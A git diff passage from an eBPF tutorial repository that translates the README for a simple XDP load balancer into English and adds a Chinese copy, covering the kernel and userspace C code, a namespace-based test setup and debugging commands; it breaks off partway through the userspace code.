为什么选择XDP而不是其他方法? +- `Cilium` is an open-source networking tool for cloud-native environments like Kubernetes. It uses XDP to efficiently handle packet filtering and load balancing, improving performance in high-traffic networks. +- `Katran`, developed by Facebook, is a load balancer that uses XDP to handle millions of connections with low CPU usage. It distributes traffic efficiently across servers and is used internally at Facebook for large-scale networking. +- `Cloudflare` uses XDP to protect against DDoS attacks. By filtering out malicious traffic at the NIC level, Cloudflare can drop attack packets before they even reach the kernel, minimizing the impact on their network. -与传统工具如`iptables`或`tc`相比,XDP具有以下优势: +### Why Choose XDP Over Other Methods? -- **速度**:它直接在NIC驱动程序中操作,数据包处理速度远快于传统方法。 -- **灵活性**:通过eBPF,您可以编写自定义的数据包处理逻辑,以满足特定需求。 -- **效率**:XDP使用更少的资源,非常适合需要处理高流量而不使系统过载的环境。 +Compared to traditional tools like `iptables` or `tc`, XDP offers: -## 项目:构建一个简单的负载均衡器 +- **Speed**: It operates directly in the NIC driver, processing packets much faster than traditional methods. +- **Flexibility**: With eBPF, you can write custom packet-handling logic to meet specific needs. +- **Efficiency**: XDP uses fewer resources, making it suitable for environments that need to handle high traffic without overloading the system. 
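+
+To make the "simple actions" point concrete, here is a minimal, self-contained XDP program — a sketch for orientation, not part of this project's sources — that admits every packet; returning `XDP_DROP` instead would turn it into a filter:
+
+```c
+#include <linux/bpf.h>
+#include <bpf/bpf_helpers.h>
+
+SEC("xdp")
+int xdp_minimal(struct xdp_md *ctx)
+{
+    /* Other verdicts: XDP_DROP, XDP_TX, XDP_REDIRECT, XDP_ABORTED */
+    return XDP_PASS;
+}
+
+char _license[] SEC("license") = "GPL";
+```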
-在本项目中,我们将专注于使用XDP构建一个负载均衡器。负载均衡器通过将传入的网络流量高效地分发到多个后端服务器,防止单个服务器过载。结合XDP和eBPF,我们可以构建一个运行在Linux网络堆栈边缘的负载均衡器,确保即使在高流量情况下也能保持高性能。 +## The Project: Building a Simple Load Balancer -我们将实现的负载均衡器将具备以下功能: +In this project, we will be focusing on building a load balancer using XDP. A load balancer efficiently distributes incoming network traffic across multiple backend servers to prevent any single server from becoming overwhelmed. With the combination of XDP and eBPF, we can build a load balancer that operates at the edge of the Linux networking stack, ensuring high performance even under heavy traffic conditions. -- 监听传入的网络数据包。 -- 根据数据包的源IP和端口计算哈希值,从而将流量分发到多个后端服务器。 -- 根据计算出的哈希值将数据包转发到相应的后端服务器。 +The load balancer we’ll be implementing will: -我们将保持设计简单但强大,向您展示如何利用eBPF的能力来创建一个轻量级的负载均衡解决方案。 +- Listen for incoming network packets. +- Calculate a hash based on the packet's source IP and port, allowing us to distribute the traffic across multiple backend servers. +- Forward the packet to the appropriate backend server based on the calculated hash. + +We'll keep the design simple but powerful, showing you how to leverage eBPF’s capabilities to create a lightweight load balancing solution. ## kernel eBPF code @@ -162,13 +163,13 @@ int xdp_load_balancer(struct xdp_md *ctx) { char _license[] SEC("license") = "GPL"; ``` -## 内核代码关键部分解读 +Here’s a breakdown of the key sections of the kernel code for your blog: -### 1. **头文件和数据结构** +### 1. **Header Files and Data Structures** -代码首先包含了一些必要的头文件,例如 ``、``、`` 等。这些头文件提供了处理以太网帧、IP 数据包以及 BPF 辅助函数的定义。 +The code begins with necessary header files like ``, ``, ``, and more. These headers provide definitions for handling Ethernet frames, IP packets, and BPF helper functions. -`backend_config` 结构体被定义用于存储后端服务器的 IP 和 MAC 地址。这将在负载均衡逻辑中用于根据流量分配规则路由数据包。 +The `backend_config` struct is defined to hold the IP and MAC address of backend servers. This will later be used for routing packets based on load balancing logic. ```c struct backend_config { @@ -177,9 +178,9 @@ struct backend_config { }; ``` -### 2. **后端和负载均衡器配置** +### 2. **Backend and Load Balancer Configuration** -代码定义了一个名为 `backends` 的 eBPF map,用于存储两个后端的 IP 和 MAC 地址。`BPF_MAP_TYPE_ARRAY` 类型用于存储后端的配置信息,`max_entries` 设置为 2,表示该负载均衡器将把流量分配给两个后端服务器。 +The code defines an eBPF map named `backends` that stores IP and MAC addresses for two backends. The `BPF_MAP_TYPE_ARRAY` type is used to store backend configuration, with `max_entries` set to 2, indicating the load balancer will route to two backend servers. ```c struct { @@ -190,7 +191,7 @@ struct { } backends SEC(".maps"); ``` -同时也预定义了客户端和负载均衡器的 IP 地址和 MAC 地址: +There are also predefined IP addresses and MAC addresses for the client and load balancer: ```c int client_ip = bpf_htonl(0xa000001); @@ -199,9 +200,9 @@ int load_balancer_ip = bpf_htonl(0xa00000a); unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; ``` -### 3. **校验和函数** +### 3. **Checksum Functions** -`iph_csum()` 函数在修改数据包内容后重新计算 IP 头的校验和。在对头部进行任何修改时,确保 IP 数据包的完整性是至关重要的。 +The function `iph_csum()` recalculates the IP header checksum after modifying the packet's contents. It's essential to keep the integrity of IP packets when any modification is done to the headers. ```c static __always_inline __u16 iph_csum(struct iphdr *iph) { @@ -211,12 +212,12 @@ static __always_inline __u16 iph_csum(struct iphdr *iph) { } ``` -### 4. **XDP 程序逻辑** +### 4. 
**XDP Program Logic** -XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该函数附加到 XDP 钩子上。它处理传入的数据包,并根据不同情况将数据包转发到后端或回传给客户端。 +The core of the XDP load balancer logic is implemented in the `xdp_load_balancer` function, which is attached to the XDP hook. It processes incoming packets and directs them either to a backend or back to the client. -- **初始检查**: - 函数首先验证数据包是否是以太网帧,接着检查它是否是 IP 数据包(IPv4)并且使用了 TCP 协议。 +- **Initial Checks**: + The function begins by verifying that the packet is an Ethernet frame, then checks if it's an IP packet (IPv4) and if it's using the TCP protocol. ```c if (eth->h_proto != __constant_htons(ETH_P_IP)) @@ -225,8 +226,8 @@ XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该 return XDP_PASS; ``` -- **客户端数据包处理**: - 如果源 IP 与客户端 IP 匹配,代码使用 `xxhash32` 对 IP 头进行哈希处理,以确定相应的后端(基于 key 对 2 取模)。 +- **Client Packet Handling**: + If the source IP matches the client IP, the code hashes the IP header using `xxhash32` to determine the appropriate backend (based on the key modulo 2). ```c if (iph->saddr == client_ip) { @@ -234,44 +235,43 @@ XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该 struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); ``` - 之后将目标 IP 和 MAC 替换为选定的后端的值,并将数据包转发到后端。 + The destination IP and MAC are replaced with those of the selected backend, and the packet is forwarded to the backend. -- **后端数据包处理**: - 如果数据包来自后端服务器,代码将目标设置为客户端的 IP 和 MAC 地址,确保后端的响应数据包被正确地转发回客户端。 +- **Backend Packet Handling**: + If the packet is from a backend server, the destination is set to the client’s IP and MAC address, ensuring that the backend’s response is directed back to the client. ```c iph->daddr = client_ip; __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); ``` -- **重写 IP 和 MAC 地址**: - 对于所有的出站数据包,源 IP 和 MAC 地址会被更新为负载均衡器的值,以确保在客户端与后端之间通信时,负载均衡器作为源进行标识。 +- **Rewriting IP and MAC Addresses**: + The source IP and MAC are updated to the load balancer’s values for all outgoing packets, ensuring that the load balancer appears as the source for both client-to-backend and backend-to-client communication. ```c iph->saddr = load_balancer_ip; __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); ``` -- **重新计算校验和**: - 修改 IP 头之后,使用之前定义的 `iph_csum()` 函数重新计算校验和。 +- **Recalculate Checksum**: + After modifying the IP header, the checksum is recalculated using the previously defined `iph_csum()` function. ```c iph->check = iph_csum(iph); ``` -- **最终动作**: - 使用 `XDP_TX` 动作发送数据包,这指示网卡将修改后的数据包传输出去。 +- **Final Action**: + The packet is transmitted using the `XDP_TX` action, which instructs the NIC to send the modified packet. ```c return XDP_TX; ``` -### 5. **结论** +### 5. **Conclusion** -在这部分博客中,可以解释负载均衡器是如何通过检查源 IP、进行哈希计算来分配流量,并通过修改目标 IP 和 MAC 来确保数据包的转发。`XDP_TX` 动作是实现 eBPF 在 XDP 层中高速数据包处理的关键。 - -这一解释可以帮助读者理解数据包的流转过程,以及代码中每个部分在实现多个后端之间负载均衡的过程中所起的作用。 +This part of the blog could explain how the load balancer ensures traffic is efficiently routed between the client and two backend servers by inspecting the source IP, hashing it for load distribution, and modifying the destination IP and MAC before forwarding the packet. The `XDP_TX` action is key to the high-speed packet handling provided by eBPF in the XDP layer. +This explanation can help readers understand the flow of the packet and the role of each section of the code in managing load balancing across multiple backends. ## Userspace code @@ -374,35 +374,33 @@ int main(int argc, char **argv) { } ``` -### 用户空间代码概述 +The userspace code provided is responsible for setting up and configuring the XDP load balancer program that runs in the kernel. 
It accepts command-line arguments, loads the eBPF program, attaches it to a network interface, and updates the backend configurations. -提供的用户空间代码负责设置和配置在内核中运行的 XDP 负载均衡器程序。它接受命令行参数,加载 eBPF 程序,将其附加到网络接口,并更新后端服务器的配置信息。 +### 1. **Argument Parsing and Backend Setup** -### 1. **解析命令行参数和设置后端服务器** +The program expects five command-line arguments: the name of the network interface (`ifname`), the IP addresses and MAC addresses of two backend servers. It then parses the IP addresses using `inet_pton()` and the MAC addresses using the `parse_mac()` function, which ensures that the format of the provided MAC addresses is correct. The parsed backend information is stored in a `backend_config` structure. -程序期望五个命令行参数:网络接口的名称 (`ifname`)、两个后端服务器的 IP 地址和 MAC 地址。它通过 `inet_pton()` 函数解析 IP 地址,并使用 `parse_mac()` 函数解析 MAC 地址,确保提供的 MAC 地址格式正确。解析后的后端信息存储在 `backend_config` 结构体中。 +### 2. **Loading and Attaching the BPF Program** -### 2. **加载并附加 BPF 程序** +The BPF skeleton (generated via `xdp_lb.skel.h`) is used to open and load the XDP program into the kernel. The program then identifies the network interface by converting the interface name into an index using `if_nametoindex()`. Afterward, it attaches the loaded BPF program to this interface using `bpf_program__attach_xdp()`. -BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加载到内核中。程序通过 `if_nametoindex()` 将网络接口名称转换为索引,然后使用 `bpf_program__attach_xdp()` 将加载的 BPF 程序附加到此接口上。 +### 3. **Configuring Backend Information** -### 3. **配置后端服务器信息** +The backend IP and MAC addresses are written to the `backends` BPF map using `bpf_map_update_elem()`. This step ensures that the BPF program has access to the backend configurations, allowing it to route packets to the correct backend servers based on the logic in the kernel code. -后端的 IP 和 MAC 地址被写入 `backends` BPF map 中,使用 `bpf_map_update_elem()` 函数。此步骤确保 BPF 程序能够访问后端配置,从而基于内核代码中的逻辑将数据包路由到正确的后端服务器。 +### 4. **Program Loop and Cleanup** -### 4. **程序循环与清理** +The program enters an infinite loop (`while (1) { sleep(1); }`) to keep running, allowing the XDP program to continue functioning. When the user decides to exit by pressing Ctrl+C, the BPF program is detached from the network interface, and resources are cleaned up by calling `xdp_lb_bpf__destroy()`. -程序进入无限循环(`while (1) { sleep(1); }`),使 XDP 程序保持运行。当用户通过按下 Ctrl+C 退出时,BPF 程序从网络接口上卸载,并通过调用 `xdp_lb_bpf__destroy()` 清理资源。 +In summary, this userspace code is responsible for configuring and managing the lifecycle of the XDP load balancer, making it easy to update backend configurations dynamically and ensuring the load balancer is correctly attached to a network interface. -总的来说,这段用户空间代码负责配置和管理 XDP 负载均衡器的生命周期,使得可以动态更新后端配置,并确保负载均衡器正确附加到网络接口上。 +## The topology of test environment -### 测试环境拓扑 - -拓扑结构表示一个测试环境,其中本地机器通过负载均衡器与两个后端节点(h2 和 h3)通信。通过虚拟以太网对(veth0 到 veth6),本地机器与负载均衡器相连,在受控环境中模拟网络连接。每个虚拟接口都有自己的 IP 和 MAC 地址,代表不同的实体。 +The topology represents a test environment where a local machine communicates with two backend nodes (h2 and h3) through a load balancer. The local machine is connected to the load balancer via virtual Ethernet pairs (veth0 to veth6), simulating network connections in a controlled environment. Each virtual interface has its own IP and MAC address to represent different entities. 
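+
+The diagram below shows the layout. Each link is an ordinary veth pair with one end moved into a namespace; as a sketch of the kind of iproute2 commands `setup.sh` builds on (the script in the repository is the authoritative version):
+
+```sh
+ip netns add lb                                 # namespace for the load balancer
+ip link add veth0 type veth peer name veth1     # veth pair: host <-> lb
+ip link set veth1 netns lb                      # move one end into the namespace
+ip addr add 10.0.0.1/24 dev veth0               # address the host side
+ip link set veth0 up
+ip netns exec lb ip link set veth1 up
+```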
```txt +---------------------------+ - | 本地机器 | + | Local Machine | | IP: 10.0.0.1 (veth0) | | MAC: DE:AD:BE:EF:00:01 | +------------+---------------+ @@ -410,7 +408,7 @@ BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加 | (veth1) | +--------+---------------+ - | 负载均衡器 | + | Load Balancer | | IP: 10.0.0.10 (veth6) | | MAC: DE:AD:BE:EF:00:10| +--------+---------------+ @@ -428,31 +426,31 @@ BPF skeleton(通过 `xdp_lb.skel.h` 生成)用于打开并将 XDP 程序加 +------------------+ +------------------+ ``` -这个设置可以通过脚本(`setup.sh`)轻松初始化,并通过另一个脚本(`teardown.sh`)删除。 +The setup can be easily initialized with a script (setup.sh), and removed with a teardown script (teardown.sh). -> 如果您对本教程感兴趣,请帮助我们创建一个容器化的版本,简化设置和拓扑结构!目前的设置和删除过程基于网络命名空间,容器化的版本会更加友好。 +> If you are interested in this tutorial, please help us create a containerized version of the setup and topology! Currently the setup and teardown are based on the network namespace, it will be more friendly to have a containerized version of the setup and topology. -初始化: +Setup: ```sh sudo ./setup.sh ``` -删除: +Teardown: ```sh sudo ./teardown.sh ``` -### 运行负载均衡器 +### Running the Load Balancer -要运行 XDP 负载均衡器,执行以下命令,指定接口和后端服务器的 IP 和 MAC 地址: +To run the XDP load balancer, execute the following command, specifying the interface and backends' IP and MAC addresses: ```console sudo ip netns exec lb ./xdp_lb veth6 10.0.0.2 de:ad:be:ef:00:02 10.0.0.3 de:ad:be:ef:00:03 ``` -这将配置负载均衡器并输出后端服务器的详细信息: +This will configure the load balancer and print the details of the backends: ```console XDP load balancer configured with backends: @@ -461,67 +459,70 @@ Backend 2 - IP: 10.0.0.3, MAC: de:ad:be:ef:00:03 Press Ctrl+C to exit... ``` -### 测试设置 +### Testing the Setup -您可以通过在两个后端命名空间(`h2` 和 `h3`)启动 HTTP 服务器,并从本地机器向负载均衡器发送请求来测试设置: +You can test the setup by starting HTTP servers on the two backend namespaces (`h2` and `h3`) and sending requests from the local machine to the load balancer: -在 `h2` 和 `h3` 上启动服务器: +Start servers on `h2` and `h3`: ```sh sudo ip netns exec h2 python3 -m http.server sudo ip netns exec h3 python3 -m http.server ``` -然后,向负载均衡器 IP 发送请求: +Then, send a request to the load balancer IP: ```sh curl 10.0.0.10:8000 ``` -负载均衡器将根据哈希函数将流量分配到后端服务器(`h2` 和 `h3`)。 +The load balancer will distribute traffic to the backends (`h2` and `h3`) based on the hashing function. -### 使用 `bpf_printk` 进行监控 +### Monitoring with `bpf_printk` -您可以通过查看 `bpf_printk` 日志来监控负载均衡器的活动。BPF 程序在处理每个数据包时会打印诊断消息。您可以使用以下命令查看这些日志: +You can monitor the load balancer's activity by checking the `bpf_printk` logs. The BPF program prints diagnostic messages whenever a packet is processed. You can view these logs using: ```console sudo cat /sys/kernel/debug/tracing/trace_pipe ``` -日志示例: +Example output: ```console -0 [004] ..s2. 24174.812722: bpf_trace_printk: xdp_load_balancer received packet -0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Source IP: 0xa000001 --0 [004] .Ns2. 24174.812729: Received Destination IP: 0xa00000a --0 [004] .Ns2. 24174.812731: Received Source MAC: de:ad:be:ef:0:1 --0 [004] .Ns2. 24174.812732: Received Destination MAC: de:ad:be:ef:0:10 --0 [004] .Ns2. 24174.812732: Packet from client +-0 [004] .Ns2. 24174.812729: bpf_trace_printk: Received Destination IP: 0xa00000a +-0 [004] .Ns2. 24174.812731: bpf_trace_printk: Received Source MAC: de:ad:be:ef:0:1 +-0 [004] .Ns2. 24174.812732: bpf_trace_printk: Received Destination MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812732: bpf_trace_printk: Packet from client -0 [004] .Ns2. 
24174.812734: bpf_trace_printk: Redirecting packet to new IP 0xa000002 from IP 0xa00000a --0 [004] .Ns2. 24174.812735: New Dest MAC: de:ad:be:ef:0:2 --0 [004] .Ns2. 24174.812735: New Source MAC: de:ad:be:ef:0:10 +-0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Dest MAC: de:ad:be:ef:0:2 +-0 [004] .Ns2. 24174.812735: bpf_trace_printk: New Source MAC: de:ad:be:ef:0:10 ``` -### 调试问题 +### Debugging Issues -某些系统可能会因为类似于此[博客文章](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/)中描述的问题而导致数据包丢失或转发失败。您可以使用 `bpftrace` 跟踪 XDP 错误进行调试: +Some systems may experience packet loss or failure to forward packets due to issues similar to those described in this [blog post](https://fedepaol.github.io/blog/2023/09/11/xdp-ate-my-packets-and-how-i-debugged-it/). You can debug these issues using `bpftrace` to trace XDP errors: ```sh sudo bpftrace -e 'tracepoint:xdp:xdp_bulk_tx{@redir_errno[-args->err] = count();}' ``` -如果输出如下所示: +If you see an output like this: ```sh @redir_errno[6]: 3 ``` -这表明与 XDP 数据包转发相关的错误。错误代码 `6` 通常指向可以进一步调查的特定转发问题。 +It indicates errors related to XDP packet forwarding. The error code `6` typically points to a particular forwarding issue that can be further investigated. -### 结论 +### Conclusion -本教程展示了如何使用 eBPF 设置一个简单的 XDP 负载均衡器,以实现高效的流量分发。对于那些想了解更多关于 eBPF 知识的用户,包括更高级的示例和教程,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。 +This tutorial demonstrates how to set up a simple XDP load balancer using eBPF, providing efficient traffic distribution across backend servers. For those interested in learning more about eBPF, including more advanced examples and tutorials, please visit our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). -### 参考文献 +### References -- [XDP 编程实践教程](https://github.com/xdp-project/xdp-tutorial) \ No newline at end of file +Here’s a simple list of XDP references: + +1. [XDP Programming Hands-On Tutorial](https://github.com/xdp-project/xdp-tutorial) +2. [XDP Tutorial in bpf-developer-tutorial](https://eunomia.dev/tutorials/21-xdp/) diff --git a/src/42-xdp-loadbalancer/README.zh.md b/src/42-xdp-loadbalancer/README.zh.md new file mode 100644 index 0000000..06fc527 --- /dev/null +++ b/src/42-xdp-loadbalancer/README.zh.md @@ -0,0 +1,527 @@ +# eBPF 开发者教程: 简单的 XDP 负载均衡器 + +在本教程中,我们将指导您如何使用eBPF(扩展的Berkeley Packet Filter)实现一个简单的XDP(eXpress Data Path)负载均衡器。只需使用C语言和libbpf库,无需外部依赖,这是一个适合开发者的实践指南,帮助您充分利用Linux内核的强大功能来构建高效的网络应用程序。 + +## 为什么选择XDP? + +`XDP`(eXpress Data Path)是Linux中的一个高速、内核级网络框架,它允许在网络堆栈的最早阶段,即在网络接口卡(NIC)上处理数据包。这使得XDP可以进行超低延迟和高吞吐量的数据包处理,非常适合用于负载均衡、DDoS保护和流量过滤等任务。 + +XDP的关键特性: + +1. **快速数据包处理**:XDP直接在网络接口卡(NIC)级别处理数据包,减少了延迟,并通过避免通常的网络堆栈开销来提高性能。 +2. **高效**:由于在数据包进入内核之前处理它们,XDP最大限度地减少了CPU使用率,能够在高流量负载下保持系统的快速响应。 +3. **可定制的eBPF**:XDP程序使用eBPF编写,允许您为特定的用例创建自定义的数据包处理逻辑,例如丢弃、重定向或转发数据包。 +4. **低CPU开销**:支持零拷贝数据包转发,XDP占用更少的系统资源,非常适合在最少CPU负载的情况下处理高流量。 +5. **简单操作**:XDP程序返回预定义的操作,例如丢弃、通过或重定向数据包,提供对流量处理的控制。 + +### 使用XDP的项目 + +- `Cilium` 是一个为云原生环境(如Kubernetes)设计的开源网络工具。它使用XDP高效处理数据包过滤和负载均衡,提升了高流量网络中的性能。 +- `Katran` 由Facebook开发,是一个负载均衡器,它使用XDP处理数百万的连接,且CPU使用率低。它高效地将流量分发到服务器,在Facebook内部被用于大规模的网络环境。 +- `Cloudflare` 使用XDP来防御DDoS攻击。通过在NIC级别过滤恶意流量,Cloudflare可以在攻击数据包进入内核之前将其丢弃,最大限度地减少对网络的影响。 + +### 为什么选择XDP而不是其他方法? 
+ +与传统工具如`iptables`或`tc`相比,XDP具有以下优势: + +- **速度**:它直接在NIC驱动程序中操作,数据包处理速度远快于传统方法。 +- **灵活性**:通过eBPF,您可以编写自定义的数据包处理逻辑,以满足特定需求。 +- **效率**:XDP使用更少的资源,非常适合需要处理高流量而不使系统过载的环境。 + +## 项目:构建一个简单的负载均衡器 + +在本项目中,我们将专注于使用XDP构建一个负载均衡器。负载均衡器通过将传入的网络流量高效地分发到多个后端服务器,防止单个服务器过载。结合XDP和eBPF,我们可以构建一个运行在Linux网络堆栈边缘的负载均衡器,确保即使在高流量情况下也能保持高性能。 + +我们将实现的负载均衡器将具备以下功能: + +- 监听传入的网络数据包。 +- 根据数据包的源IP和端口计算哈希值,从而将流量分发到多个后端服务器。 +- 根据计算出的哈希值将数据包转发到相应的后端服务器。 + +我们将保持设计简单但强大,向您展示如何利用eBPF的能力来创建一个轻量级的负载均衡解决方案。 + +## kernel eBPF code + +```c +// xdp_lb.bpf.c +#include +#include +#include +#include +#include +#include +#include +#include "xx_hash.h" + +struct backend_config { + __u32 ip; + unsigned char mac[ETH_ALEN]; +}; + +// Backend IP and MAC address map +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); // Two backends + __type(key, __u32); + __type(value, struct backend_config); +} backends SEC(".maps"); + +int client_ip = bpf_htonl(0xa000001); +unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; +int load_balancer_ip = bpf_htonl(0xa00000a); +unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; + +static __always_inline __u16 +csum_fold_helper(__u64 csum) +{ + int i; + for (i = 0; i < 4; i++) + { + if (csum >> 16) + csum = (csum & 0xffff) + (csum >> 16); + } + return ~csum; +} + +static __always_inline __u16 +iph_csum(struct iphdr *iph) +{ + iph->check = 0; + unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); + return csum_fold_helper(csum); +} + +SEC("xdp") +int xdp_load_balancer(struct xdp_md *ctx) { + void *data_end = (void *)(long)ctx->data_end; + void *data = (void *)(long)ctx->data; + + bpf_printk("xdp_load_balancer received packet"); + + // Ethernet header + struct ethhdr *eth = data; + if ((void *)(eth + 1) > data_end) + return XDP_PASS; + + // Check if the packet is IP (IPv4) + if (eth->h_proto != __constant_htons(ETH_P_IP)) + return XDP_PASS; + + // IP header + struct iphdr *iph = (struct iphdr *)(eth + 1); + if ((void *)(iph + 1) > data_end) + return XDP_PASS; + + // Check if the protocol is TCP or UDP + if (iph->protocol != IPPROTO_TCP) + return XDP_PASS; + + bpf_printk("Received Source IP: 0x%x", bpf_ntohl(iph->saddr)); + bpf_printk("Received Destination IP: 0x%x", bpf_ntohl(iph->daddr)); + bpf_printk("Received Source MAC: %x:%x:%x:%x:%x:%x", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); + bpf_printk("Received Destination MAC: %x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); + + if (iph->saddr == client_ip) + { + bpf_printk("Packet from client"); + + __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; + + struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); + if (!backend) + return XDP_PASS; + + iph->daddr = backend->ip; + __builtin_memcpy(eth->h_dest, backend->mac, ETH_ALEN); + } + else + { + bpf_printk("Packet from backend"); + iph->daddr = client_ip; + __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); + } + + // Update IP source address to the load balancer's IP + iph->saddr = load_balancer_ip; + // Update Ethernet source MAC address to the current lb's MAC + __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); + + // Recalculate IP checksum + iph->check = iph_csum(iph); + + bpf_printk("Redirecting packet to new IP 0x%x from IP 0x%x", + bpf_ntohl(iph->daddr), + bpf_ntohl(iph->saddr) + ); + bpf_printk("New Dest MAC: 
%x:%x:%x:%x:%x:%x", eth->h_dest[0], eth->h_dest[1], eth->h_dest[2], eth->h_dest[3], eth->h_dest[4], eth->h_dest[5]); + bpf_printk("New Source MAC: %x:%x:%x:%x:%x:%x\n", eth->h_source[0], eth->h_source[1], eth->h_source[2], eth->h_source[3], eth->h_source[4], eth->h_source[5]); + // Return XDP_TX to transmit the modified packet back to the network + return XDP_TX; +} + +char _license[] SEC("license") = "GPL"; +``` + +## 内核代码关键部分解读 + +### 1. **头文件和数据结构** + +代码首先包含了一些必要的头文件,例如 ``、``、`` 等。这些头文件提供了处理以太网帧、IP 数据包以及 BPF 辅助函数的定义。 + +`backend_config` 结构体被定义用于存储后端服务器的 IP 和 MAC 地址。这将在负载均衡逻辑中用于根据流量分配规则路由数据包。 + +```c +struct backend_config { + __u32 ip; + unsigned char mac[ETH_ALEN]; +}; +``` + +### 2. **后端和负载均衡器配置** + +代码定义了一个名为 `backends` 的 eBPF map,用于存储两个后端的 IP 和 MAC 地址。`BPF_MAP_TYPE_ARRAY` 类型用于存储后端的配置信息,`max_entries` 设置为 2,表示该负载均衡器将把流量分配给两个后端服务器。 + +```c +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, 2); + __type(key, __u32); + __type(value, struct backend_config); +} backends SEC(".maps"); +``` + +同时也预定义了客户端和负载均衡器的 IP 地址和 MAC 地址: + +```c +int client_ip = bpf_htonl(0xa000001); +unsigned char client_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x1}; +int load_balancer_ip = bpf_htonl(0xa00000a); +unsigned char load_balancer_mac[ETH_ALEN] = {0xDE, 0xAD, 0xBE, 0xEF, 0x0, 0x10}; +``` + +### 3. **校验和函数** + +`iph_csum()` 函数在修改数据包内容后重新计算 IP 头的校验和。在对头部进行任何修改时,确保 IP 数据包的完整性是至关重要的。 + +```c +static __always_inline __u16 iph_csum(struct iphdr *iph) { + iph->check = 0; + unsigned long long csum = bpf_csum_diff(0, 0, (unsigned int *)iph, sizeof(struct iphdr), 0); + return csum_fold_helper(csum); +} +``` + +### 4. **XDP 程序逻辑** + +XDP 负载均衡器的核心逻辑在 `xdp_load_balancer` 函数中实现,该函数附加到 XDP 钩子上。它处理传入的数据包,并根据不同情况将数据包转发到后端或回传给客户端。 + +- **初始检查**: + 函数首先验证数据包是否是以太网帧,接着检查它是否是 IP 数据包(IPv4)并且使用了 TCP 协议。 + + ```c + if (eth->h_proto != __constant_htons(ETH_P_IP)) + return XDP_PASS; + if (iph->protocol != IPPROTO_TCP) + return XDP_PASS; + ``` + +- **客户端数据包处理**: + 如果源 IP 与客户端 IP 匹配,代码使用 `xxhash32` 对 IP 头进行哈希处理,以确定相应的后端(基于 key 对 2 取模)。 + + ```c + if (iph->saddr == client_ip) { + __u32 key = xxhash32((const char*)iph, sizeof(struct iphdr), 0) % 2; + struct backend_config *backend = bpf_map_lookup_elem(&backends, &key); + ``` + + 之后将目标 IP 和 MAC 替换为选定的后端的值,并将数据包转发到后端。 + +- **后端数据包处理**: + 如果数据包来自后端服务器,代码将目标设置为客户端的 IP 和 MAC 地址,确保后端的响应数据包被正确地转发回客户端。 + + ```c + iph->daddr = client_ip; + __builtin_memcpy(eth->h_dest, client_mac, ETH_ALEN); + ``` + +- **重写 IP 和 MAC 地址**: + 对于所有的出站数据包,源 IP 和 MAC 地址会被更新为负载均衡器的值,以确保在客户端与后端之间通信时,负载均衡器作为源进行标识。 + + ```c + iph->saddr = load_balancer_ip; + __builtin_memcpy(eth->h_source, load_balancer_mac, ETH_ALEN); + ``` + +- **重新计算校验和**: + 修改 IP 头之后,使用之前定义的 `iph_csum()` 函数重新计算校验和。 + + ```c + iph->check = iph_csum(iph); + ``` + +- **最终动作**: + 使用 `XDP_TX` 动作发送数据包,这指示网卡将修改后的数据包传输出去。 + + ```c + return XDP_TX; + ``` + +### 5. 
**结论** + +在这部分博客中,可以解释负载均衡器是如何通过检查源 IP、进行哈希计算来分配流量,并通过修改目标 IP 和 MAC 来确保数据包的转发。`XDP_TX` 动作是实现 eBPF 在 XDP 层中高速数据包处理的关键。 + +这一解释可以帮助读者理解数据包的流转过程,以及代码中每个部分在实现多个后端之间负载均衡的过程中所起的作用。 + + +## Userspace code + +```c +// xdp_lb.c +#include +#include +#include +#include +#include +#include +#include +#include +#include "xdp_lb.skel.h" // The generated skeleton + +struct backend_config { + __u32 ip; + unsigned char mac[6]; +}; + +static int parse_mac(const char *str, unsigned char *mac) { + if (sscanf(str, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx", + &mac[0], &mac[1], &mac[2], &mac[3], &mac[4], &mac[5]) != 6) { + fprintf(stderr, "Invalid MAC address format\n"); + return -1; + } + return 0; +} + +int main(int argc, char **argv) { + if (argc != 6) { + fprintf(stderr, "Usage: %s \n", argv[0]); + return 1; + } + + const char *ifname = argv[1]; + struct backend_config backend[2]; + + // Parse backend 1 + if (inet_pton(AF_INET, argv[2], &backend[0].ip) != 1) { + fprintf(stderr, "Invalid backend 1 IP address\n"); + return 1; + } + if (parse_mac(argv[3], backend[0].mac) < 0) { + return 1; + } + + // Parse backend 2 + if 